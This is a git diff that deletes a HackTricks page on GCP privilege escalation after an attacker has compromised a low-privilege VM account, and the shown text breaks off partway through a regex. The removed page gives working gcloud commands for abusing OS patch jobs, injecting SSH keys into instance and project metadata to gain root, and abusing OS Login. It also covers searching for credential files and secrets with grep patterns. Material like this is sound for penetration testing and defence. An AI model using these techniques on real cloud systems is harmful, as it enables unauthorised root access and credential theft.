-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
deleted file mode 100644
index be89b20b9..000000000
--- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
+++ /dev/null
@@ -1,291 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project.
-
-Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
-
-# OS Patching
-Depending on the privileges associated with the service account you have access to, if it has either the `osconfig.patchDeployments.create` or `osconfig.patchJobs.exec` permissions you can create a [patch job or deployment](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project.
-
-First check all the roles the account has:
-
-`gcloud iam roles list`
-
-Now check the permissions offered by the role, if it has access to either the patch deployment or job continue.
-
-`gcloud iam roles describe roles/ | grep -E '(osconfig.patchDeployments.create|osconfig.patchJobs.exec)'`
-
-
-If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json) for a patch job run:
-
-`gcloud compute os-config patch-jobs execute --file=patch.json`
-
-
-To deploy a patch deployment:
-
-`gcloud compute os-config patch-deployments create my-update --file=patch.json`
-
-Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to detect lax permissions and automatically move laterally.
-
-# Read the scripts
-
-**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts.
-
-As IAM is go granular, an account may have **read/write** privileges over a resource but **no list privileges**.
-
-A great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`.
-
-Running `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission. However, if you ran `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks.
-
-You may be able to find this bucket name inside a script (in bash, Python, Ruby...).
-
-# Custom Metadata
-
-Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
-
-```bash
-# view project metadata
-curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-
-# view instance metadata
-curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-```
-
-# Modifying the metadata
-
-If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission:
-
-_**Default service account**_\
-If the service account access **scope** is set to **full access** or at least is explicitly allowing **access to the compute API**, then this configuration is **vulnerable** to escalation. The **default** **scope** is **not** **vulnerable**.
-
-_**Custom service account**_\
-When using a custom service account, **one** of the following IAM permissions **is** **necessary** to escalate privileges:
-
-* `compute.instances.setMetadata` (to affect a single instance)
-* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project)
-
-Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating\_a\_service\_account\_to\_an\_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**:
-
-* `https://www.googleapis.com/auth/compute`
-* `https://www.googleapis.com/auth/cloud-platfo`rm
-
-## **Add SSH keys to custom metadata**
-
-**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
-
-**If a new public** key is encountered, it will be processed and **added to the local machine**. Depending on the format of the key, it will either be added to the `~/.ssh/authorized_keys` file of an **existing user or will create a new user with `sudo` rights**.
-
-So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon.
-
-## **Add SSH key to existing privileged user**
-
-Let's start by adding our own key to an existing account, as that will probably make the least noise.
-
-**Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights.
-
-```bash
-gcloud compute instances describe [INSTANCE] --zone [ZONE]
-```
-
-Look for a section like the following:
-
-```
- ...
- metadata:
- fingerprint: QCZfVTIlKgs=
- items:
- ...
- - key: ssh-keys
- value: |-
- alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice
- bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob
- ...
-```
-
-Notice the **slightly odd format** of the public keys - the **username** is listed at the **beginning** (followed by a colon) and then again at the **end**. We'll need to match this format. Unlike normal SSH key operation, the username absolutely matters!
-
-**Save the lines with usernames and keys in a new text** file called `meta.txt`.
-
-Let's assume we are targeting the user `alice` from above. We'll **generate a new key** for ourselves like this:
-
-```bash
-ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
-```
-
-Add your new public key to the file `meta.txt` imitating the format:
-
-```
-alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice
-bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob
-alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuMrv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsvEVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlPuxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWCxQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice
-```
-
-Now, you can **re-write the SSH key metadata** for your instance with the following command:
-
-```bash
-gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
-```
-
-You can now **access a shell in the context of `alice`** as follows:
-
-```
-lowpriv@instance:~$ ssh -i ./key alice@localhost
-alice@instance:~$ sudo id
-uid=0(root) gid=0(root) groups=0(root)
-```
-
-## **Create a new privileged user and add a SSH key**
-
-No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target?
-
-You can **follow the same process** as above, but just **make up a new username**. This user will be created automatically and given rights to `sudo`. Scripted, the process would look like this:
-
-```bash
-# define the new account username
-NEWUSER="definitelynotahacker"
-
-# create a key
-ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
-
-# create the input meta file
-NEWKEY="$(cat ./key.pub)"
-echo "$NEWUSER:$NEWKEY" > ./meta.txt
-
-# update the instance metadata
-gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt
-
-# ssh to the new account
-ssh -i ./key "$NEWUSER"@localhost
-```
-
-## **Grant sudo to existing session**
-
-This one is so easy, quick, and dirty that it feels wrongβ¦
-
-```
-gcloud compute ssh [INSTANCE NAME]
-```
-
-This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.
-
-## SSH keys at project level
-
-Following the details mentioned in the previous section you can try to compromise more VMs.
-
-We can expand upon those a bit by [**applying SSH keys at the project level**](https://cloud.google.com/compute/docs/instances/adding-removing-ssh-keys#project-wide), granting you permission to **SSH into a privileged account** for any instance that has not explicitly chosen the "Block project-wide SSH keys" option.:
-
-```
-gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
-```
-
-If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
-
-# **Using OS Login**
-
-[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
-
-OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
-
-OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
-
-The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
-
-* **compute.instances.osLogin** (no sudo)
-* **compute.instances.osAdminLogin** (has sudo)
-
-Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
-
-If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
-
-Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
-
-# Search for Keys in the filesystem
-
-It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
-
-First, find what `gcloud` config directories exist in users' home folders.
-
-```
-sudo find / -name "gcloud"
-```
-
-You can manually inspect the files inside, but these are generally the ones with the secrets:
-
-* \~/.config/gcloud/credentials.db
-* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/adc.json
-* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/.boto
-* \~/.credentials.json
-
-Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
-
-## More API Keys regexes
-
-```bash
-TARGET_DIR="/path/to/whatever"
-
-# Service account keys
-grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
- "$TARGET_DIR"
-
-# Legacy GCP creds
-grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
- "$TARGET_DIR"
-
-# Google API keys
-grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
- "$TARGET_DIR"
-
-# Google OAuth tokens
-grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
- "$TARGET_DIR"
-
-# Generic SSH keys
-grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
- "$TARGET_DIR"
-
-# Signed storage URLs
-grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
- "$TARGET_DIR"
-
-# Signed policy documents in HTML
-grep -Pzr '(?s)